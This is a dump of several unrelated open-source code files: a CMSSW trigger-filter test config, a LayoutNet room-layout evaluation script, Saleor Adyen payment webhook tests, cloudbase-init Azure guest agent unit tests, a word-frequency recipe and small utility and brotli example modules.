process.filter_wrong_pattern = hlt.hltHighLevel.clone(
HLTPaths = ['*_wrong'],
throw = False
)
## start testing AlCaRecoTriggerBits ##############################
##
## This works after having run a modified version of
## cmsRun src/CondTools/HLT/test/AlCaRecoTriggerBitsRcdWrite_cfg.py
## Simply remove overwriting of
## process.AlCaRecoTriggerBitsRcdWrite.triggerLists ...
##
## AlCaRecoTriggerBits
#process.filter_AlCaRecoTriggerBits = hlt.hltHighLevel.clone(
# eventSetupPathsKey = 'test13', #'TkAlMinBias',
# throw = False # True
#)
#
## DB input
#import CondCore.DBCommon.CondDBSetup_cfi
#process.dbInput = cms.ESSource(
# "PoolDBESSource",
# CondCore.DBCommon.CondDBSetup_cfi.CondDBSetup,
# connect = cms.string('sqlite_file:AlCaRecoTriggerBits.db'),
# toGet = cms.VPSet(cms.PSet(
# record = cms.string('AlCaRecoTriggerBitsRcd'),
# tag = cms.string('TestTag') # choose tag you want
# )
# )
# )
#process.end_AlCaRecoTriggerBits = cms.Path( process.filter_AlCaRecoTriggerBits )
##
## end testing AlCaRecoTriggerBits ################################
process.end_1 = cms.Path( process.filter_1 )
process.end_2 = cms.Path( process.filter_2 )
process.end_3 = cms.Path( process.filter_3 )
process.end_any_implicit = cms.Path( process.filter_any_implicit )
process.end_any_explicit = cms.Path( process.filter_any_explicit )
process.end_any_star = cms.Path( process.filter_any_star )
process.end_any_doublestar = cms.Path( process.filter_any_doublestar )
process.end_any_question = cms.Path( process.filter_any_question )
#process.end_any_filter = cms.Path( ~ ( ~ process.filter_1 + ~ process.filter_2 + ~ process.filter_3) )
process.end_all_implicit = cms.Path( process.filter_all_implicit )
process.end_all_explicit = cms.Path( process.filter_all_explicit )
process.end_all_star = cms.Path( process.filter_all_star )
process.end_all_doublestar = cms.Path( process.filter_all_doublestar )
process.end_all_question = cms.Path( process.filter_all_question )
process.end_all_filter = cms.Path( process.filter_1 + process.filter_2 + process.filter_3 )
process.end_wrong_name = cms.Path( process.filter_wrong_name )
process.end_wrong_pattern = cms.Path( process.filter_wrong_pattern )
process.end_not_wrong_pattern = cms.Path( ~process.filter_wrong_pattern )
# define an EndPath to analyze all other path results
process.hltTrigReport = cms.EDAnalyzer( 'HLTrigReport',
HLTriggerResults = cms.InputTag( 'TriggerResults','','TEST' )
)
process.HLTAnalyzerEndpath = cms.EndPath( process.hltTrigReport )
|
test_matterport.py | kopetri/LayoutNetv2 | 166 | 12718942 | from __future__ import print_function
from __future__ import division
import torch
import torch.nn as nn
import torch.optim as optim
import numpy as np
print("PyTorch Version: ",torch.__version__)
import pickle
import os
import scipy.io as sio
import cv2
from model import *
from pano import get_ini_cor
from pano_opt_gen import optimize_cor_id
import post_proc2 as post_proc
from shapely.geometry import Polygon
from scipy.ndimage.filters import maximum_filter
from scipy.ndimage import convolve
import scipy.signal
import sys
from sklearn.metrics import classification_report
# general case
# Top level data directory. Here we assume the format of the directory conforms
# to the ImageFolder structure
test_path = './data/matterport/mp3d_align/'
weight_path = './model/resnet34_matterport.pth'
save_path = './result_gen/'
depth_path = './result_gen_depth/'
depth_path_gt = './data/matterport/share_depth/'
# Pre-trained models to choose from [resnet18, resnet34, resnet50]
#model_name = "resnet18"
model_name = "resnet34"
#model_name = "resnet50"
num_classes = 1024
print("Load Models...")
# Define the encoder
encoder = initialize_encoder(model_name, num_classes,use_pretrained=True)
# Full model
model_ft = SegNet(encoder, num_classes)
model_ft.load_state_dict(torch.load(weight_path))
# Detect if we have a GPU available
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# Send the model to GPU
model_ft = model_ft.to(device)
# evaluation mode
model_ft.eval()
def find_N_peaks(signal, r=29, min_v=0.05, N=None):
max_v = maximum_filter(signal, size=r, mode='wrap')
pk_loc = np.where(max_v == signal)[0]
pk_loc = pk_loc[signal[pk_loc] > min_v]
# check for odd case, remove one
if (pk_loc.shape[0]%2)!=0:
pk_id = np.argsort(-signal[pk_loc])
pk_loc = pk_loc[pk_id[:-1]]
pk_loc = np.sort(pk_loc)
if N is not None:
order = np.argsort(-signal[pk_loc])
pk_loc = pk_loc[order[:N]]
pk_loc = pk_loc[np.argsort(pk_loc)]
return pk_loc, signal[pk_loc]
def find_N_peaks_conv(signal, prominence, distance, N=4):
locs, _ = scipy.signal.find_peaks(signal,
prominence=prominence,
distance=distance)
pks = signal[locs]
pk_id = np.argsort(-pks)
pk_loc = locs[pk_id[:min(N, len(pks))]]
pk_loc = np.sort(pk_loc)
return pk_loc, signal[pk_loc]
def get_ini_cor(cor_img, d1=21, d2=3):
cor = convolve(cor_img, np.ones((d1, d1)), mode='constant', cval=0.0)
cor_id = []
cor_ = cor_img.sum(0)
cor_ = (cor_-np.amin(cor_))/np.ptp(cor_)
min_v = 0.25#0.05
xs_ = find_N_peaks(cor_, r=26, min_v=min_v, N=None)[0]
# spetial case for too less corner
if xs_.shape[0] < 4:
xs_ = find_N_peaks(cor_, r=26, min_v=0.05, N=None)[0]
if xs_.shape[0] < 4:
xs_ = find_N_peaks(cor_, r=26, min_v=0, N=None)[0]
X_loc = xs_
for x in X_loc:
x_ = int(np.round(x))
V_signal = cor[:, max(0, x_-d2):x_+d2+1].sum(1)
y1, y2 = find_N_peaks_conv(V_signal, prominence=None,
distance=20, N=2)[0]
cor_id.append((x, y1))
cor_id.append((x, y2))
cor_id = np.array(cor_id, np.float64)
return cor_id
def test_general(dt_cor_id, gt_cor_id, w, h, losses):
dt_floor_coor = dt_cor_id[1::2]
dt_ceil_coor = dt_cor_id[0::2]
gt_floor_coor = gt_cor_id[1::2]
gt_ceil_coor = gt_cor_id[0::2]
assert (dt_floor_coor[:, 0] != dt_ceil_coor[:, 0]).sum() == 0
assert (gt_floor_coor[:, 0] != gt_ceil_coor[:, 0]).sum() == 0
# Eval 3d IoU and height error(in meter)
N = len(dt_floor_coor)
ch = -1.6
dt_floor_xy = post_proc.np_coor2xy(dt_floor_coor, ch, 1024, 512, floorW=1, floorH=1)
gt_floor_xy = post_proc.np_coor2xy(gt_floor_coor, ch, 1024, 512, floorW=1, floorH=1)
dt_poly = Polygon(dt_floor_xy)
gt_poly = Polygon(gt_floor_xy)
area_dt = dt_poly.area
area_gt = gt_poly.area
if area_dt < 1e-05:
print('too small room')
# Add a result
n_corners = len(gt_floor_coor)
n_corners = str(n_corners) if n_corners < 14 else '14+'
losses[n_corners]['2DIoU'].append(0)
losses[n_corners]['3DIoU'].append(0)
losses['overall']['2DIoU'].append(0)
losses['overall']['3DIoU'].append(0)
return
area_inter = dt_poly.intersection(gt_poly).area
area_union = dt_poly.union(gt_poly).area
area_pred_wo_gt = dt_poly.difference(gt_poly).area
area_gt_wo_pred = gt_poly.difference(dt_poly).area
iou2d = area_inter / (area_gt + area_dt - area_inter)
cch_dt = post_proc.get_z1(dt_floor_coor[:, 1], dt_ceil_coor[:, 1], ch, 512)
cch_gt = post_proc.get_z1(gt_floor_coor[:, 1], gt_ceil_coor[:, 1], ch, 512)
h_dt = abs(cch_dt.mean() - ch)
h_gt = abs(cch_gt.mean() - ch)
#iouH = min(h_dt, h_gt) / max(h_dt, h_gt)
#iou3d = iou2d * iouH
iou3d = (area_inter * min(h_dt, h_gt)) / (area_pred_wo_gt * h_dt + area_gt_wo_pred * h_gt + area_inter * max(h_dt, h_gt))
# Add a result
n_corners = len(gt_floor_coor)
n_corners = str(n_corners) if n_corners < 14 else '14+'
losses[n_corners]['2DIoU'].append(iou2d)
losses[n_corners]['3DIoU'].append(iou3d)
losses['overall']['2DIoU'].append(iou2d)
losses['overall']['3DIoU'].append(iou3d)
# Load data
gt_txt_path = '/data/czou4/Layout/_final_label_v2/test.txt'
namelist = []
with open(gt_txt_path, 'r') as f:
while(True):
line = f.readline().strip()
if not line:
break
namelist.append(line)
criterion = nn.BCELoss()
criterion2 = nn.BCELoss()
cnt = 0
num = 0
loss_cor = 0.0
loss_pe = 0.0
loss_3d = 0.0
loss_sum = 0.0
losses = dict([
(n_corner, {'2DIoU': [], '3DIoU': [], 'rmse':[], 'delta_1':[]})
for n_corner in ['4', '6', '8', '10', '12', '14+', 'overall']
])
# for precision recall
target_names = ['4 corners', '6 corners', '8 corners', '10 corners', '12 corners', '14 corners', '16 corners', '18 corners']
y_true = np.zeros(len(namelist))
y_pred = np.zeros(len(namelist))
for file_list in namelist:
#file_list = np.random.choice(namelist, 1)
#file_list = file_list[0]
print(file_list)
file_list_sub = file_list.split(" ")
pkl_path = os.path.join(test_path,file_list_sub[0],file_list_sub[1])
img = cv2.imread(os.path.join(pkl_path,'aligned_rgb.png'))
img = img.astype('float32')/255.0
mask = cv2.imread(os.path.join(pkl_path,'aligned_line.png'))
mask = mask.astype('float32')/255.0
gt = np.loadtxt(os.path.join(pkl_path,'cor.txt'))
# lr flip
img2 = np.fliplr(img).copy()
mask2 = np.fliplr(mask).copy()
image = torch.tensor(img).to(device).float()
masks = torch.tensor(mask).to(device).float()
inputs = image.permute(2,0,1)
inputs = inputs.unsqueeze(0)
masks = masks.permute(2,0,1)
masks = masks.unsqueeze(0)
inputs = torch.cat((inputs,masks),1)
image2 = torch.tensor(img2).to(device).float()
masks2 = torch.tensor(mask2).to(device).float()
inputs2 = image2.permute(2,0,1)
inputs2 = inputs2.unsqueeze(0)
masks2 = masks2.permute(2,0,1)
masks2 = masks2.unsqueeze(0)
inputs2 = torch.cat((inputs2,masks2),1)
inputs = torch.cat((inputs, inputs2),0)
# forward
outputs, outputs2 = model_ft(inputs)
# lr flip and take mean
outputs1 = outputs[1]
outputs22 = outputs2[1]
inv_idx = torch.arange(outputs1.size(2)-1, -1, -1).to(device).long()
outputs1 = outputs1.index_select(2, inv_idx)
outputs = torch.mean(torch.cat((outputs[0].unsqueeze(0), outputs1.unsqueeze(0)), 0), 0, True)
outputs22 = outputs22.index_select(2, inv_idx)
outputs2 = torch.mean(torch.cat((outputs2[0].unsqueeze(0), outputs22.unsqueeze(0)), 0), 0, True)
outputs = outputs.squeeze(0).permute(1,2,0)
outputs2 = outputs2.squeeze(0).squeeze(0)
inputs = inputs[0].permute(1,2,0)
#gradient ascent refinement
cor_img = outputs2.data.cpu().numpy()
edg_img = outputs.data.cpu().numpy()
#general layout, tp view
cor_ = cor_img.sum(0)
cor_ = (cor_-np.amin(cor_))/np.ptp(cor_)
min_v = 0.25#0.05
xs_ = find_N_peaks(cor_, r=26, min_v=min_v, N=None)[0]
# spetial case for too less corner
if xs_.shape[0] < 4:
xs_ = find_N_peaks(cor_, r=26, min_v=0.05, N=None)[0]
if xs_.shape[0] < 4:
xs_ = find_N_peaks(cor_, r=26, min_v=0, N=None)[0]
# get ceil and floor line
ceil_img = edg_img[:,:,1]
floor_img = edg_img[:,:,2]
ceil_idx = np.argmax(ceil_img, axis=0)
floor_idx = np.argmax(floor_img, axis=0)
# Init floor/ceil plane
z0 = 50
force_cuboid=False
_, z1 = post_proc.np_refine_by_fix_z(ceil_idx, floor_idx, z0)
# Generate general wall-wall
cor, xy_cor = post_proc.gen_ww(xs_, ceil_idx, z0, tol=abs(0.16 * z1 / 1.6), force_cuboid=force_cuboid)
if not force_cuboid:
# Check valid (for fear self-intersection)
xy2d = np.zeros((len(xy_cor), 2), np.float32)
for i in range(len(xy_cor)):
xy2d[i, xy_cor[i]['type']] = xy_cor[i]['val']
xy2d[i, xy_cor[i-1]['type']] = xy_cor[i-1]['val']
if not Polygon(xy2d).is_valid:
# actually it's not force cuboid, just assume all corners are visible, go back to original LayoutNet initialization
#print(
# 'Fail to generate valid general layout!! '
# 'Generate cuboid as fallback.',
# file=sys.stderr)
cor_id = get_ini_cor(cor_img, 21, 3)
force_cuboid= True
if not force_cuboid:
# Expand with btn coory
cor = np.hstack([cor, post_proc.infer_coory(cor[:, 1], z1 - z0, z0)[:, None]])
# Collect corner position in equirectangular
cor_id = np.zeros((len(cor)*2, 2), np.float32)
for j in range(len(cor)):
cor_id[j*2] = cor[j, 0], cor[j, 1]
cor_id[j*2 + 1] = cor[j, 0], cor[j, 2]
# refinement
cor_id = optimize_cor_id(cor_id, edg_img, cor_img, num_iters=100, verbose=False)
test_general(cor_id, gt, 1024, 512, losses)
# save, uncomment to generate depth map
#print(save_path+file_list_sub[0]+'_'+file_list_sub[1]+'.mat')
#sio.savemat(save_path+file_list_sub[0]+'_'+file_list_sub[1]+'.mat',{'cor_id':cor_id})
#load
pred_depth = depth_path+file_list_sub[0]+'_'+file_list_sub[1]+'.mat'
if os.path.exists(pred_depth):
pred_depth = sio.loadmat(pred_depth)
pred_depth = pred_depth['im_depth']
#gt
gt_depth = np.load(os.path.join(depth_path_gt, file_list_sub[0], file_list_sub[1], 'new_depth.npy'))
pred_depth = cv2.resize(pred_depth, (gt_depth.shape[1], gt_depth.shape[0]))
# rmse
pred_depth = pred_depth[np.nonzero(gt_depth)]
gt_depth = gt_depth[np.nonzero(gt_depth)]
rmse = np.average((gt_depth - pred_depth) ** 2) ** 0.5
# delta_1
max_map = np.where(gt_depth/pred_depth > pred_depth/gt_depth, gt_depth/pred_depth, pred_depth/gt_depth)
delta_1 = np.average(np.where(max_map < 1.25, 1, 0))
# Add a result
n_corners = len(gt[1::2])
n_corners = str(n_corners) if n_corners < 14 else '14+'
losses[n_corners]['rmse'].append(rmse)
losses[n_corners]['delta_1'].append(delta_1)
losses['overall']['rmse'].append(rmse)
losses['overall']['delta_1'].append(delta_1)
torch.cuda.empty_cache()
#del outputs1, outputs, outputs2, outputs22, labels, labels2, inputs, inputs2, loss
del outputs1, outputs, outputs2, outputs22, inputs, inputs2
y_true[cnt] = int(gt.shape[0]//2//2-2)
y_pred[cnt] = int(cor_id.shape[0]//2//2-2)
cnt += 1
num += 1
iou2d = np.array(losses['overall']['2DIoU'])
iou3d = np.array(losses['overall']['3DIoU'])
rmse = np.array(losses['overall']['rmse'])
delta_1 = np.array(losses['overall']['delta_1'])
print('No. {}, 2d Loss: {:.6f}, 3d Loss: {:.6f}, rmse: {:.6f}, delta_1: {:.6f}'.format(cnt,iou2d.mean() * 100,iou3d.mean() * 100, rmse.mean() *100, delta_1.mean()*100))
for k, result in losses.items():
iou2d = np.array(result['2DIoU'])
iou3d = np.array(result['3DIoU'])
rmse = np.array(result['rmse'])
delta_1 = np.array(result['delta_1'])
if len(iou2d) == 0:
continue
print('GT #Corners: %s (%d instances)' % (k, len(iou2d)))
print(' 2DIoU: %.2f' % ( iou2d.mean() * 100))
print(' 3DIoU: %.2f' % ( iou3d.mean() * 100))
print(' RMSE: %.2f' % ( rmse.mean()*100))
print(' Delta_1: %.2f' % ( delta_1.mean()*100))
print(classification_report(y_true, y_pred, target_names=target_names))
|
test/SIM_test_ip/Modified_data/next_level.py | gilbertguoze/trick | 647 | 12718961 |
test.ip.c_pointer_types.cpp[0][0][0] = ["Cat" , "Dog"]
test.ip.c_pointer_types.cpp[0][0][1] = ["Horse"]
|
Bio/Alphabet/__init__.py | lukasz-kozlowski/biopython | 2,856 | 12718973 | <reponame>lukasz-kozlowski/biopython
# Copyright 2000-2002 by <NAME>.
# Revisions copyright 2007-2010 by <NAME>.
# All rights reserved.
#
# This file is part of the Biopython distribution and governed by your
# choice of the "Biopython License Agreement" or the "BSD 3-Clause License".
# Please see the LICENSE file that should have been included as part of this
# package.
"""Alphabets were previously used to declare sequence type and letters (OBSOLETE).
The design of Bio.Aphabet included a number of historic design choices
which, with the benefit of hindsight, were regretable. Bio.Alphabet was
therefore removed from Biopython in release 1.78. Instead, the molecule type is
included as an annotation on SeqRecords where appropriate.
Please see https://biopython.org/wiki/Alphabet for examples showing how to
transition from Bio.Alphabet to molecule type annotations.
"""
raise ImportError(
"Bio.Alphabet has been removed from Biopython. In many cases, the alphabet can simply be ignored and removed from scripts. In a few cases, you may need to specify the ``molecule_type`` as an annotation on a SeqRecord for your script to work correctly. Please see https://biopython.org/wiki/Alphabet for more information."
)
|
recipes/Python/578851_BentleyKnuth_problem/recipe-578851.py | tdiprima/code | 2,023 | 12718993 | # bentley_knuth.py
# Author: <NAME> - http://www.dancingbison.com
# Version: 0.1
# The problem this program tries to solve is from the page:
# http://www.leancrew.com/all-this/2011/12/more-shell-less-egg/
# Description: The program Bentley asked Knuth to write:
# Read a file of text, determine the n most frequently
# used words, and print out a sorted list of those words
# along with their frequencies.
import sys
import os
import string
sys_argv = sys.argv
def usage():
sys.stderr.write("Usage: %s n file\n" % sys_argv[0])
sys.stderr.write("where n is the number of most frequently\n")
sys.stderr.write("used words you want to find, and \n")
sys.stderr.write("file is the name of the file in which to look.\n")
if len(sys_argv) < 3:
usage()
sys.exit(1)
try:
n = int(sys_argv[1])
except ValueError:
sys.stderr.write("%s: Error: %s is not a decimal numeric value" % (sys_argv[0],
sys_argv[1]))
sys.exit(1)
print "n =", n
if n < 1:
sys.stderr.write("%s: Error: %s is not a positive value" %
(sys_argv[0], sys_argv[1]))
in_filename = sys.argv[2]
print "%s: Finding %d most frequent words in file %s" % \
(sys_argv[0], n, in_filename)
try:
fil_in = open(in_filename)
except IOError:
sys.stderr.write("%s: ERROR: Could not open in_filename %s\n" % \
(sys_argv[0], in_filename))
sys.exit(1)
word_freq_dict = {}
for lin in fil_in:
words_in_line = lin.split()
for word in words_in_line:
if word_freq_dict.has_key(word):
word_freq_dict[word] += 1
else:
word_freq_dict[word] = 1
word_freq_list = []
for item in word_freq_dict.items():
word_freq_list.append(item)
wfl = sorted(word_freq_list,
key=lambda word_freq_list: word_freq_list[1], reverse=True)
#wfl.reverse()
print "The %d most frequent words sorted by decreasing frequency:" % n
len_wfl = len(wfl)
if n > len_wfl:
print "n = %d, file has only %d unique words," % (n, len_wfl)
print "so printing %d words" % len_wfl
print "Word: Frequency"
m = min(n, len_wfl)
for i in range(m):
print wfl[i][0], ": ", wfl[i][1]
fil_in.close()
|
saleor/payment/gateways/adyen/tests/webhooks/test_get_or_create_adyen_partial_payments.py | victor-abz/saleor | 1,392 | 12719000 | <filename>saleor/payment/gateways/adyen/tests/webhooks/test_get_or_create_adyen_partial_payments.py
from decimal import Decimal
from ...webhooks import get_or_create_adyen_partial_payments
def test_get_or_create_adyen_partial_payments_with_additional_actions_response(
payment_adyen_for_checkout,
):
# given
notification_data = {
"additionalData": {
"order-2-paymentMethod": "visa",
"threeds2.cardEnrolled": "false",
"order-2-pspReference": "861643021198177D",
"order-2-paymentAmount": "GBP 16.29",
"recurringProcessingModel": "Subscription",
"paymentMethod": "visa",
"order-1-pspReference": "861643021155073F",
"order-1-paymentAmount": "GBP 14.71",
"order-1-paymentMethod": "givex",
},
"pspReference": "861643021198177D",
"resultCode": "Authorised",
"merchantReference": "UGF5bWVudDoyNw==",
"paymentMethod": "visa",
"shopperLocale": "en_GB",
}
checkout = payment_adyen_for_checkout.checkout
# when
get_or_create_adyen_partial_payments(notification_data, payment_adyen_for_checkout)
# then
partial_payments = list(checkout.payments.exclude(id=payment_adyen_for_checkout.id))
assert len(partial_payments) == 2
assert all([payment.is_active is False for payment in partial_payments])
assert all([payment.partial is True for payment in partial_payments])
assert all([payment.is_active is False for payment in partial_payments])
assert any(payment.total == Decimal("14.71") for payment in partial_payments)
assert any(payment.total == Decimal("16.29") for payment in partial_payments)
assert any(
payment.psp_reference == "861643021155073F" for payment in partial_payments
)
assert any(
payment.psp_reference == "861643021198177D" for payment in partial_payments
)
def test_get_or_create_adyen_partial_payments_with_notification_payload(
notification, payment_adyen_for_checkout
):
# given
notification_data = notification()
notification_data["additionalData"] = {
"order-2-paymentMethod": "visa",
"order-2-pspReference": "881643125782168B",
"order-2-paymentAmount": "GBP 29.10",
"order-1-pspReference": "861643125754056E",
"order-1-paymentAmount": "GBP 41.90",
"order-1-paymentMethod": "givex",
}
checkout = payment_adyen_for_checkout.checkout
# when
get_or_create_adyen_partial_payments(notification_data, payment_adyen_for_checkout)
# then
partial_payments = list(checkout.payments.exclude(id=payment_adyen_for_checkout.id))
assert len(partial_payments) == 2
assert all([payment.is_active is False for payment in partial_payments])
assert all([payment.partial is True for payment in partial_payments])
assert all([payment.is_active is False for payment in partial_payments])
assert any(payment.total == Decimal("29.10") for payment in partial_payments)
assert any(payment.total == Decimal("41.90") for payment in partial_payments)
assert any(
payment.psp_reference == "881643125782168B" for payment in partial_payments
)
assert any(
payment.psp_reference == "861643125754056E" for payment in partial_payments
)
|
addon-sdk-1.17/python-lib/cuddlefish/util.py | hankduan/firefoxExtension | 102 | 12719012 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
IGNORED_FILE_PREFIXES = ["."]
IGNORED_FILE_SUFFIXES = ["~", ".swp"]
IGNORED_DIRS = [".git", ".svn", ".hg"]
def filter_filenames(filenames, ignored_files=[".hgignore"]):
for filename in filenames:
if filename in ignored_files:
continue
if any([filename.startswith(suffix)
for suffix in IGNORED_FILE_PREFIXES]):
continue
if any([filename.endswith(suffix)
for suffix in IGNORED_FILE_SUFFIXES]):
continue
yield filename
def filter_dirnames(dirnames):
return [dirname for dirname in dirnames if dirname not in IGNORED_DIRS]
|
cloudbaseinit/tests/plugins/windows/test_azureguestagent.py | andia10240/cloudbase-init | 160 | 12719031 | <reponame>andia10240/cloudbase-init<filename>cloudbaseinit/tests/plugins/windows/test_azureguestagent.py
# Copyright (c) 2017 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import importlib
import os
import unittest
try:
import unittest.mock as mock
except ImportError:
import mock
from cloudbaseinit import conf as cloudbaseinit_conf
from cloudbaseinit import exception
from cloudbaseinit.plugins.common import base
from cloudbaseinit.tests import testutils
CONF = cloudbaseinit_conf.CONF
MODPATH = "cloudbaseinit.plugins.windows.azureguestagent"
class AzureGuestAgentPluginTest(unittest.TestCase):
def setUp(self):
self.mock_wmi = mock.MagicMock()
self._moves_mock = mock.MagicMock()
patcher = mock.patch.dict(
"sys.modules",
{
"wmi": self.mock_wmi,
"six.moves": self._moves_mock
}
)
patcher.start()
self.addCleanup(patcher.stop)
self._winreg_mock = self._moves_mock.winreg
self._azureguestagent = importlib.import_module(MODPATH)
self._azureagentplugin = self._azureguestagent.AzureGuestAgentPlugin()
self.snatcher = testutils.LogSnatcher(MODPATH)
def test_check_delete_service(self):
mock_osutils = mock.Mock()
mock_service_name = mock.sentinel.name
self._azureagentplugin._check_delete_service(mock_osutils,
mock_service_name)
mock_osutils.check_service_exists.assert_called_once_with(
mock_service_name)
mock_osutils.get_service_status.assert_called_once_with(
mock_service_name)
mock_osutils.stop_service.assert_called_once_with(mock_service_name,
wait=True)
mock_osutils.delete_service.assert_called_once_with(mock_service_name)
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._check_delete_service")
def test_remove_agent_services(self, mock_check_delete_service):
mock_osutils = mock.Mock()
expected_logs = ["Stopping and removing any existing Azure guest "
"agent services"]
with self.snatcher:
self._azureagentplugin._remove_agent_services(mock_osutils)
self.assertEqual(self.snatcher.output, expected_logs)
self.assertEqual(mock_check_delete_service.call_count, 3)
@mock.patch("shutil.rmtree")
@mock.patch("os.path.exists")
@mock.patch("os.getenv")
def test_remove_azure_dirs(self, mock_os_getenv,
mock_exists, mock_rmtree):
mock_rmtree.side_effect = (None, Exception)
mock_exists.return_value = True
mock_os_getenv.return_value = "fake_path"
with self.snatcher:
self._azureagentplugin._remove_azure_dirs()
mock_os_getenv.assert_called_with("SystemDrive")
self.assertEqual(mock_os_getenv.call_count, 2)
self.assertEqual(mock_exists.call_count, 2)
self.assertEqual(mock_rmtree.call_count, 2)
def test_set_registry_vm_type(self):
vm_type = mock.sentinel.vm
key_name = "SOFTWARE\\Microsoft\\Windows Azure"
self._azureagentplugin._set_registry_vm_type(vm_type)
key = self._winreg_mock.CreateKey.return_value.__enter__.return_value
self._winreg_mock.CreateKey.assert_called_with(
self._winreg_mock.HKEY_LOCAL_MACHINE, key_name)
self._winreg_mock.SetValueEx.assert_called_once_with(
key, "VMType", 0, self._winreg_mock.REG_SZ, vm_type)
def test_set_registry_ga_params(self):
fake_version = (1, 2, 3, 4)
fake_install_timestamp = datetime.datetime.now()
key_name = "SOFTWARE\\Microsoft\\GuestAgent"
self._azureagentplugin._set_registry_ga_params(fake_version,
fake_install_timestamp)
self._winreg_mock.CreateKey.assert_called_with(
self._winreg_mock.HKEY_LOCAL_MACHINE, key_name)
self.assertEqual(self._winreg_mock.SetValueEx.call_count, 2)
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._set_registry_ga_params")
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._set_registry_vm_type")
def test_configure_rd_agent(self, mock_set_registry_vm_type,
mock_set_registry_ga_params):
mock_osutils = mock.Mock()
fake_ga_path = "C:\\"
expected_rd_path = os.path.join(fake_ga_path,
self._azureguestagent.RDAGENT_FILENAME)
expected_path = os.path.join(fake_ga_path, "TransparentInstaller.dll")
self._azureagentplugin._configure_rd_agent(mock_osutils, fake_ga_path)
mock_osutils.create_service.assert_called_once_with(
self._azureguestagent.SERVICE_NAME_RDAGENT,
self._azureguestagent.SERVICE_NAME_RDAGENT,
expected_rd_path,
mock_osutils.SERVICE_START_MODE_MANUAL)
mock_osutils.get_file_version.assert_called_once_with(expected_path)
mock_set_registry_vm_type.assert_called_once_with()
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._run_logman")
def test_stop_event_trace(self, mock_run_logman):
mock_osutils = mock.Mock()
fake_name = mock.sentinel.event_name
res = self._azureagentplugin._stop_event_trace(mock_osutils, fake_name)
mock_run_logman.assert_called_once_with(mock_osutils, "stop",
fake_name, False)
self.assertIsNotNone(res)
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._run_logman")
def test_delete_event_trace(self, mock_run_logman):
mock_osutils = mock.Mock()
fake_name = mock.sentinel.event_name
res = self._azureagentplugin._delete_event_trace(mock_osutils,
fake_name)
mock_run_logman.assert_called_once_with(mock_osutils, "delete",
fake_name)
self.assertIsNotNone(res)
def test_run_logman(self):
mock_osutils = mock.Mock()
fake_action = mock.sentinel.action
fake_name = mock.sentinel.cmd_name
expected_args = ["logman.exe", "-ets", fake_action, fake_name]
mock_osutils.execute_system32_process.return_value = (0, 0, -1)
self._azureagentplugin._run_logman(mock_osutils, fake_action,
fake_name, True)
mock_osutils.execute_system32_process.assert_called_once_with(
expected_args)
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._stop_event_trace")
def test_stop_ga_event_traces(self, mock_stop_event_trace):
mock_osutils = mock.Mock()
expected_logs = ["Stopping Azure guest agent event traces"]
with self.snatcher:
self._azureagentplugin._stop_ga_event_traces(mock_osutils)
self.assertEqual(mock_stop_event_trace.call_count, 4)
self.assertEqual(self.snatcher.output, expected_logs)
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._delete_event_trace")
def test_delete_ga_event_traces(self, mock_delete_event_trace):
mock_osutils = mock.Mock()
expected_logs = ["Deleting Azure guest agent event traces"]
with self.snatcher:
self._azureagentplugin._delete_ga_event_traces(mock_osutils)
self.assertEqual(mock_delete_event_trace.call_count, 2)
self.assertEqual(self.snatcher.output, expected_logs)
@mock.patch("os.path.exists")
def _test_get_guest_agent_source_path(self, mock_exists,
drives=None, exists=False):
mock_osutils = mock.Mock()
mock_exists.return_value = exists
mock_osutils.get_logical_drives.return_value = drives
if not exists:
self.assertRaises(
exception.CloudbaseInitException,
self._azureagentplugin._get_guest_agent_source_path,
mock_osutils)
return
res = self._azureagentplugin._get_guest_agent_source_path(mock_osutils)
self.assertIsNotNone(res)
def test_get_guest_agent_source_path_no_agent(self):
self._test_get_guest_agent_source_path(drives=[])
def test_get_guest_agent_source_path(self):
mock_drive = "C:"
self._test_get_guest_agent_source_path(drives=[mock_drive],
exists=True)
def _test_execute(self,
provisioning_data=None, expected_logs=None):
mock_service = mock.Mock()
mock_sharedata = mock.Mock()
expected_res = (base.PLUGIN_EXECUTION_DONE, False)
(mock_service.get_vm_agent_package_provisioning_data.
return_value) = provisioning_data
if not provisioning_data or not provisioning_data.get("provision"):
with self.snatcher:
res = self._azureagentplugin.execute(mock_service,
mock_sharedata)
(mock_service.get_vm_agent_package_provisioning_data.
assert_called_once_with())
self.assertEqual(res, expected_res)
self.assertEqual(self.snatcher.output, expected_logs)
return
def test_execute_no_data(self):
expected_logs = ["Azure guest agent provisioning data not present"]
self._test_execute(expected_logs=expected_logs)
def test_execute_no_provision(self):
mock_data = {"provision": None}
expected_logs = ["Skipping Azure guest agent provisioning "
"as by metadata request"]
self._test_execute(provisioning_data=mock_data,
expected_logs=expected_logs)
def test_get_os_requirements(self):
expected_res = ('win32', (6, 1))
res = self._azureagentplugin.get_os_requirements()
self.assertEqual(res, expected_res)
|
lldb/packages/Python/lldbsuite/test/lang/cpp/thread_local/TestThreadLocal.py | medismailben/llvm-project | 456 | 12719042 | <gh_stars>100-1000
from lldbsuite.test import lldbinline
from lldbsuite.test import decorators
lldbinline.MakeInlineTest(__file__, globals(),
lldbinline.expectedFailureAll(oslist=[
"windows", "linux", "netbsd"]))
|
example/example_brotli_project.py | dish59742/brotlicffi | 111 | 12719066 | """A simple project that is compatible with both
'brotli' C bindings and 'brotlicffi' CFFI bindings
"""
import sys
try:
import brotlicffi as brotli
except ImportError:
import brotli
def main():
data = sys.argv[1].encode("utf-8")
print(f"Compressing data: {data}")
compressor = brotli.Compressor(mode=brotli.MODE_TEXT)
compressed = compressor.process(data) + compressor.finish()
print(f"Compressed data: {compressed}")
